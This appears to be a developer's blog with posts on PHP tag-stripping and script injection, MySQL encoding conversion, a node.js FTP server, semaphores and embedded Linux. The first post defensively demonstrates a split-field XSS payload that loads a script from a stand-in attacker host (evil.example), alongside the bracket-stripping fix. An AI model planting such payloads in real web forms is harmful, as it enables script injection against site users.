28 3 / 2012
Tag stripping not sufficient to prevent JavaScript injections
In the PHP world, solely relying upon PHP’s strip_tags() function to protect your web application from JavaScript injections is a bad idea. If you do, you may be vulnerable in even the most recent browsers (I tested in Chrome 17.0.963.83, Firefox 9.0.1 and Internet Explorer 9). There may be parallels in other languages too, so beware.
You’ll be vulnerable if the following are true:
- You’ve got a webapp that accepts user input
- You use strip_tags() or similar to sanitize fields
- You don’t explicitly remove less-than or greater-than characters from those fields (PHP’s strip_tags won’t remove a partial “<script” tag)
- Values from two or more of these fields are printed close to each other in the output HTML, with little or no markup between them
The fourth item is the tricky one: the markup between the field values must not contain any quotes, because quotes would prematurely close the script tag injection attempt. In other words, an opening SCRIPT tag can be constructed from the values of two consecutive user-input fields.
Granted, the vulnerability only arises if markup is formatted in a very specific way, but it’s worth taking another look at your code. See this gist with example HTML for what it looks like to your browser.
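Here is a small JavaScript sketch of the two-field trick. `stripCompleteTags()` is a hypothetical stand-in that only removes complete tags (a `<` eventually followed by a `>`). It models the behaviour described above and does not reproduce PHP's strip_tags(). The field names, the table-cell template and the attacker URL are all made up. The quote left open in the first field swallows the markup between the two cells, which is why that markup must not contain quotes. `stripTagsAndBrackets()` adds the extra step from the list above: explicitly dropping `<` and `>`.

```javascript
// Hypothetical stand-in for a tag stripper that only removes *complete* tags
// (a '<' later followed by a '>'). Models the behaviour described above; it is
// not a port of PHP's strip_tags().
function stripCompleteTags(input) {
  return input.replace(/<[^>]*>/g, "");
}

// The extra step recommended above: also drop any stray '<' or '>'.
function stripTagsAndBrackets(input) {
  return stripCompleteTags(input).replace(/[<>]/g, "");
}

// Hypothetical values for two user-input fields. Neither holds a complete tag,
// so the naive stripper leaves both untouched.
const city = '<script a="';
const country = '" src=//evil.example/x.js>';

// Hypothetical template: the markup between the two values contains no quotes.
const render = (clean) => `<td>${clean(city)}</td><td>${clean(country)}</td>`;

console.log(render(stripCompleteTags));
// <td><script a="</td><td>" src=//evil.example/x.js></td>
console.log(render(stripTagsAndBrackets));
// <td>script a="</td><td>" src=//evil.example/x.js</td>
```

As I read the HTML parsing rules, the first output is a single `<script>` start tag: `</td><td>` becomes the quoted value of attribute `a`, and `src` points at the attacker's URL. With the angle brackets removed, no tag can be assembled.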
I submitted a Chromium bug report, but it’s something they’re not interested in fixing.
Guess we’re on our own.
27 3 / 2012
How to GitHub: Fork, Branch, Track, Squash and Pull Request
Oh thank god! Branching I understood, but was clueless when it came to pushing up a specific branch.
Rebasing too … reminds me of how we badly need a separate dev environment at work. Ugh.
In all, a wonderful tutorial that helps you play along with others while programming.
03 11 / 2011
Character encodings in practice
Building upon Joel’s post on Unicode, here are some real-world tips relating to character encodings.
Use them by name
Always explicitly specify which encoding you want (perhaps UTF-8). Don’t assume the language or library/tool you’re using will make the right decision for you. If you value your time, don’t ignore this recommendation; otherwise you’ll likely spend far more time patching things up later.
A tale to drive this home
Until very recently, MySQL’s default charset was latin1. Our legacy code didn’t specify an encoding in PHP’s connection to MySQL, in our HTML, nor in our HTTP headers. And web browsers default to god knows what (“it depends”).
When the time came to export some table data to XML, I ran into invalid UTF-8 characters. I knew some text fields contained special characters introduced by Microsoft Word copy-pasters, so I figured flipping the switch to UTF-8 would help. NOPE!
It appears that our past failure to specify an encoding caused special characters (fancy double quotes, crosses, long dashes, etc.) to be stored in MySQL as bytes that aren’t valid UTF-8. Shit!
So I had to come up with a batch of find-and-replace regex patterns to turn those characters into proper UTF-8 or their HTML entities.
So please, do the following:
- Choose an encoding and stick to it
- Save your text files in that encoding
- Set the character encoding in your HTML
- Send the Content-Type header, including the charset, from your web server
- Change the configuration defaults for MySQL or your DBMS
- Check and set the default for each of your databases (note I said database not DBMS)
- Check and specify the encoding for your tables and text fields
- Make sure you specify the encoding when you create or alter tables in the future
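For the HTML and Content-Type items in that list, here is a minimal sketch using Node's built-in http module. Node is chosen only for illustration, and the same two declarations apply whatever serves your pages. The charset is declared both in the response header and in a `<meta charset>` tag, and the body is encoded explicitly rather than left to a default.

```javascript
const http = require("http");

// Minimal sketch: declare UTF-8 in the HTTP header *and* in the HTML itself,
// and encode the body explicitly instead of trusting library defaults.
function handler(req, res) {
  const body =
    '<!DOCTYPE html><html><head><meta charset="utf-8">' +
    "<title>Caf\u00e9</title></head><body>\u201CQuoted\u201D</body></html>";
  res.writeHead(200, {
    "Content-Type": "text/html; charset=utf-8",
    // Byte length, not string length: non-ASCII characters take several bytes.
    "Content-Length": Buffer.byteLength(body, "utf8"),
  });
  res.end(body, "utf8");
}

const server = http.createServer(handler);
```

Call `server.listen(8080)` (the port is arbitrary) to try it. The database-side items still have to be handled in MySQL's own configuration.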
Don’t convert blindly
If you failed to do the above at some point, you may have content in your database that isn’t valid UTF-8 (assuming UTF-8 is what you’re converting to, to prevent further issues).
Users that copy and paste from Microsoft Word are likely the source of this problem, but don’t blame them or Word. Blame the programmer responsible!
Your task now is to convert those invalid UTF-8 byte strings into something more usable. You may be able to convert many to their HTML entities, but you probably want to convert alphabetical characters to their valid UTF-8 representation to ensure the text remains easily searchable.
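Here is one way to do that conversion, sketched with Node's Buffer. It assumes the problem bytes are single-byte Windows-1252 punctuation (what Word tends to produce) inside otherwise latin1 text. That assumption is mine, not a diagnosis of any particular database, so check a hex dump of your own rows first. The map covers only a subset of Windows-1252. Each byte can become either the real character, so it stays searchable once saved as UTF-8, or its HTML entity.

```javascript
// Subset of Windows-1252 bytes 0x80-0x9F commonly produced by Word, with the
// Unicode character and HTML entity each one should become. Extend as needed.
const CP1252_PUNCTUATION = new Map([
  [0x85, ["\u2026", "&hellip;"]], // horizontal ellipsis
  [0x86, ["\u2020", "&dagger;"]], // dagger ("cross")
  [0x91, ["\u2018", "&lsquo;"]],  // left single quote
  [0x92, ["\u2019", "&rsquo;"]],  // right single quote
  [0x93, ["\u201C", "&ldquo;"]],  // left double quote
  [0x94, ["\u201D", "&rdquo;"]],  // right double quote
  [0x96, ["\u2013", "&ndash;"]],  // en dash
  [0x97, ["\u2014", "&mdash;"]],  // em dash
]);

// Decode legacy single-byte text. Mapped punctuation becomes the real character
// (mode "utf8") or its HTML entity (mode "entity"). Every other byte is treated
// as ISO-8859-1, where byte value == Unicode code point, so accented letters
// come out as real characters. Unmapped 0x80-0x9F bytes become C1 control
// characters, so review any that remain.
function repairLegacyBytes(bytes, mode = "utf8") {
  let out = "";
  for (const b of bytes) {
    const entry = CP1252_PUNCTUATION.get(b);
    out += entry ? entry[mode === "entity" ? 1 : 0] : String.fromCharCode(b);
  }
  return out;
}
```

For example, `repairLegacyBytes(Buffer.from([0x93, 0x48, 0x69, 0x94]))` yields “Hi” with real curly quotes. `Buffer.from(text, "utf8")` then gives the valid UTF-8 bytes to write back.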
Don’t convert blindlier
If you have to convert your table definitions and data to UTF-8 (from something like MySQL’s latin1), be careful. There’s a great post by the WordPress crew on what it entails (a multi-stage process that converts to intermediate binary column types first), but it didn’t cover this troublesome gotcha: if MySQL finds characters it can’t convert to UTF-8, it’ll truncate the rest of the field data.
MySQL will gladly go through the motions with you as you convert from latin1 to UTF-8. It’ll issue warnings that something went wrong during the conversion. But it will still truncate your data at any character that’s not valid UTF-8. Instantly your article text will go from 10234 bytes to 145. There’s probably a valid technical reason why it doesn’t error out altogether, but all I know is I now have to re-populate tons of data from backups.
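A pre-flight check can find those rows before the step that reinterprets the intermediate binary column as UTF-8. This is a minimal sketch, assuming you can pull each field's raw bytes out (for example by selecting the column with `CAST(col AS BINARY)`). The function is my own, not part of MySQL or the WordPress guide. It returns the byte offset of the first invalid UTF-8 sequence, which is roughly where the author saw the truncation happen.

```javascript
// Returns the byte offset of the first invalid UTF-8 sequence, or -1 if the
// whole buffer is valid UTF-8.
function firstInvalidUtf8Offset(bytes) {
  let i = 0;
  while (i < bytes.length) {
    const lead = bytes[i];
    let extra, cp, min;
    if (lead < 0x80) {
      i += 1; // plain ASCII
      continue;
    } else if (lead >= 0xc2 && lead <= 0xdf) {
      extra = 1; cp = lead & 0x1f; min = 0x80;
    } else if (lead >= 0xe0 && lead <= 0xef) {
      extra = 2; cp = lead & 0x0f; min = 0x800;
    } else if (lead >= 0xf0 && lead <= 0xf4) {
      extra = 3; cp = lead & 0x07; min = 0x10000;
    } else {
      return i; // stray continuation byte or impossible lead byte (e.g. 0x93)
    }
    if (i + extra >= bytes.length) return i; // sequence cut off by end of data
    for (let k = 1; k <= extra; k++) {
      const cont = bytes[i + k];
      if ((cont & 0xc0) !== 0x80) return i; // expected a 10xxxxxx byte
      cp = (cp << 6) | (cont & 0x3f);
    }
    // Reject overlong forms, UTF-16 surrogates and code points past U+10FFFF.
    if (cp < min || (cp >= 0xd800 && cp <= 0xdfff) || cp > 0x10ffff) return i;
    i += extra + 1;
  }
  return -1;
}
```

Any row where this returns something other than -1 needs repairing first. `bytes.subarray(0, offset)` shows how little of the field would survive.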
28 9 / 2011
node.js FTP server
Got to use node.js for a work project recently. We needed an FTP server with special user authentication that would run custom code after a file was uploaded. There was one node.js FTP server implementation on GitHub, so I forked it and started rounding out the basic functionality. My fork is here.
The first significant change I made was to encapsulate the data connection logic. File lists and file contents are transferred over the data connection (FTP commands and responses over the control connection). I quickly found that some clients are super eager to send you data and will do so once a passive data connection is made, even before the FTP server tells them it’s ok to do so. This was especially problematic for file uploads over passive data connections. Without a workaround for these aggressive clients, the flow looked something like this:
1. Receive PASV command from client
2. Start listening on a port and tell client which port to connect to
3. Receive STOR command from client, stating it’s going to upload a file
4. Attach data listener to data connection that saves incoming data to file
5. On data connection end event, make sure file data has been written
6. Close the file
Due to the asynchronous nature of node.js, data often arrived between steps 3 and 4, before a data event listener had been attached. Some of the file chunks were falling through the cracks and the saved file was incomplete.
Also regarding the above flow, ensuring that all data had been written to disk before we attempted to close the file was … well … convoluted. Maybe a solution could be found using fs.createWriteStream, but I’m still happier with what I’ll outline next.
Once I found out that data was falling through the cracks I did some searching and found that setting up a buffering data handler was a common solution to a common problem. Good to know! With a persistent data buffer in place things became much easier, like so:
- Receive PASV command from client
- Start listening on a port and tell client which port to connect to
- As soon as there’s any hint of a connection (socket connect event), listen for data events and append each data chunk to an in-memory list
- Receive STOR command from client, stating it’s going to upload a file
- On data connection end, open file
- Loop over buffered data
- Save each buffered chunk before moving to next chunk
- Close the file
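Here is a minimal sketch of that buffered flow using Node's net and fs modules. The class name and `saveTo()` method are hypothetical and not taken from the fork. The point is that the `data` listener is attached the instant the passive connection arrives, so nothing an eager client sends before STOR is lost.

```javascript
const fs = require("fs");

// Hypothetical helper: wrap a passive data socket as soon as the client
// connects, so chunks sent before the STOR command are not dropped.
class BufferedDataConnection {
  constructor(socket) {
    this.chunks = [];
    // Settles when the client has finished sending (or the socket fails).
    this.ended = new Promise((resolve, reject) => {
      socket.on("data", (chunk) => this.chunks.push(chunk));
      socket.on("end", resolve);
      socket.on("error", reject);
    });
    // Avoid an unhandled rejection if the socket errors before STOR arrives;
    // saveTo() still sees the rejection when it awaits this.ended.
    this.ended.catch(() => {});
  }

  // Called while handling STOR: wait for the upload to end, then open the
  // file, write each buffered chunk in arrival order, and close the file.
  async saveTo(filePath) {
    await this.ended;
    const fh = await fs.promises.open(filePath, "w");
    try {
      for (const chunk of this.chunks) {
        let offset = 0;
        // Loop in case the OS accepts only part of a chunk in one call.
        while (offset < chunk.length) {
          const { bytesWritten } = await fh.write(chunk, offset, chunk.length - offset);
          offset += bytesWritten;
        }
      }
    } finally {
      await fh.close();
    }
  }
}
```

In a PASV handler the wrapper would be created inside the `net.createServer((socket) => { ... })` callback. The STOR handler later calls `await conn.saveTo(path)`, whether the client has already finished sending or not.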
It’s less than ideal to buffer each uploaded file in memory first, but it works and is simple. Success!
In addition to the above, I’ve encapsulated things further in my forked repo. The FTP server object itself emits some additional events which you can listen for. My goal was to encapsulate the basic FTP functionality and provide a way to take special actions when:
- A user connects
- A user attempts to log in (listen for these events and handle authentication yourself)
- A user uploads a file
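The event-driven design described above could look roughly like this minimal sketch built on Node's EventEmitter. The class, method and event names (`client:connected`, `client:auth`, `file:uploaded`) are hypothetical and not the fork's actual API. Authentication is delegated to whichever listener is registered, and that listener reports its decision through a callback.

```javascript
const { EventEmitter } = require("events");

// Hypothetical shape of an FTP server that hands decisions to its listeners.
class ExtensibleFtpServer extends EventEmitter {
  handleConnect(clientInfo) {
    this.emit("client:connected", clientInfo);
  }

  // The server does not know how to authenticate; a listener decides and
  // calls reply(null) to accept or reply(error) to reject.
  handleLogin(username, password, reply) {
    if (this.listenerCount("client:auth") === 0) {
      reply(new Error("no authentication handler registered"));
      return;
    }
    this.emit("client:auth", username, password, reply);
  }

  // Fired once a STOR has been fully written to disk.
  handleUploadComplete(username, filePath) {
    this.emit("file:uploaded", username, filePath);
  }
}
```

A user of the server would register something like `ftp.on("client:auth", (user, pass, reply) => ...)` to check credentials against their own store, and `ftp.on("file:uploaded", ...)` for the post-upload custom code.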
Hopefully someone with a slightly different use-case will come along and take things the rest of the way.
07 6 / 2011
concurrency learnings
There’s a job I’ve applied for that wants “strong concurrency coursework”, which I lack. Let’s start learning.
Visited Stack Overflow first for some example problems. Learned that “embarrassingly parallel” problems are those where little or no effort is required to separate the problem into parallel tasks, like serving static files from a webserver. Good. Learning terminology is helpful. This led to mention of the R programming language’s snow package, which “implements a simple mechanism for using a collection of workstations or a Beowulf cluster for embarrassingly parallel computations”. Nice to know.
Googling more turned up some ACTUAL example problems.
Chose the first problem, and decided to investigate using POSIX semaphores: sem_open() and a named semaphore, to be specific. After some failed attempts, I found the book says the name must start with a slash for the semaphore to be shared. But that’s clearly not working. errno is helpful, but not that helpful. And remember, mode_t permissions are octal, not the const char * mode string that fopen takes. Do real C programmers always have the errno definitions handy?
The Tina process isn’t seeing any increase in the value of the Judy semaphore (which I’m using as a crude “message-passing” mechanism … every time Judy snags a cookie, she posts on her semaphore). Of course, I’m using another semaphore to guard the critical section.
So it looks like simple, cross-process named semaphores aren’t quite complete, but I may be wrong. Either way, now I’m thinking I should try placing the semaphore itself in cross-process shared memory and initializing it with sem_init() (passing a nonzero pshared argument).
My GitHub repo is here.
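JavaScript has no POSIX semaphores, so this sketch swaps in a different mechanism to show the same post/wait pattern. It is a counting semaphore stored in a SharedArrayBuffer and driven by `Atomics`, which Node worker threads can share. That is close in spirit to the sem_init()-in-shared-memory idea, but it works across threads rather than processes. The class name is hypothetical.

```javascript
// Not a POSIX semaphore: a counting semaphore kept in shared memory and driven
// by Atomics, usable across Node worker threads (not across processes).
class SharedSemaphore {
  constructor(sharedBuffer, index = 0) {
    this.cells = new Int32Array(sharedBuffer);
    this.index = index;
  }

  // Like sem_post(): increment the count and wake one waiter.
  post() {
    Atomics.add(this.cells, this.index, 1);
    Atomics.notify(this.cells, this.index, 1);
  }

  // Like sem_wait(): block until the count is positive, then decrement it.
  wait() {
    for (;;) {
      const current = Atomics.load(this.cells, this.index);
      if (current > 0) {
        // Only take the token if no other thread changed the count meanwhile.
        if (Atomics.compareExchange(this.cells, this.index, current, current - 1) === current) {
          return;
        }
      } else {
        // Sleep while the value is still `current`; returns at once if it changed.
        Atomics.wait(this.cells, this.index, current);
      }
    }
  }

  value() {
    return Atomics.load(this.cells, this.index);
  }
}
```

In the cookie problem, Judy's worker would call `post()` every time she snags a cookie and Tina's would call `wait()`. A second semaphore set to 1 with `Atomics.store()` would act as the critical-section lock. Each worker receives the SharedArrayBuffer through `workerData`.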
Will resume at a later date. Bed time.
03 6 / 2011
BeagleBoard-xM
Going the common route for now. This will at least give me some hands-on cross-compilation experience for an architecture other than x86, and hopefully enough challenges to spark some deeper learning.
Oh how I love computers that don’t whirrrrr. Will be ordering shortly.
02 6 / 2011
Been powering through Embedded Linux Primer. A few high-level things I’ve learned:
- initrd is old, initramfs is new
- initramfs uses a CPIO image (a type of archive that was new to me) to hold the initial filesystem contents
- Using TFTP to boot a kernel and ramdisk from a remote host sounds like fun, and it provides great flexibility for debugging.
- It’s not so hard to add extra items to the kernel config menu
- Learned some ins and outs of Das U-Boot, and that RAM has to be initialized by the bootloader; otherwise you can only use stack memory.
- JFFS2 can help increase the lifetime of flash memory
- The kernel boot process … through hardware-specific assembly files, common files, to the kernel C code, kernel subsystems, init.
27 5 / 2011
PHP Sadness
This title links to a wonderful list of things that are stupid about PHP. I’ve used PHP almost every week since 2001.
Reminds me that I publicly gave up on PHP about 3 years ago. But what is wrong with me … why haven’t I moved on yet? It’s because I keep taking PHP jobs, which are too easy to find. The current one will be my last. My foot is down.
25 5 / 2011
Reading a book on Embedded Linux
What follows are thoughts while reading Embedded Linux - Hardware, Software and Interfacing. Really enjoyed it.
It walks through planning for an automation system for a winter resort. Currently at chapter 6 and there’ve been a few things I’ve not done before.
Right away I discovered you could use gdb remotely with gdbserver. Great for remote debugging of cross-compiled applications.
I’ve done cross-compilation, albeit indirectly using Buildroot, but I was still aware of what went on behind the scenes: compiling gcc and glibc multiple times, the first pass being a way to bootstrap and create more “pure” versions tailored specifically for the target platform.
So far the book has remained quite high-level, so what I’m really excited about is a real-world walkthrough of writing serial communications code and Linux drivers.
… later …
Just finished a section on parallel port programming and then one on creating a simple kernel module. Had no idea a basic module would be so easy to write. Very exciting.
… later …
The book covered a few ways to do parallel port programming: using port I/O and also ppdev (which allows you to use a /dev/parport0 type device file). So handy.
It then mentioned memory-mapped I/O, synchronous serial communication, and I2C. All things I’ve heard about, but have never seen in practice. There are so many device-specific implementation details that I mainly tried to gain a high-level view of the basics as I read: send 1 to this connector, wait for settling, send 0 to another connector, send the first bit of data, toggle a latch, send the next bit of data, etc.
Now I’m going to browse my Linux Kernel Development book and get a view of the other side of things … the kernel implementation details.
10 5 / 2011
And the outcome is: I need to work less and learn more.
My lack of knowledge about information theory, and of a proper framework for thinking about it, has cost me: my data structure breaks down for anything larger than 16-bit numbers. But that’s fine. I was in over my head from the start. Though, it was fun.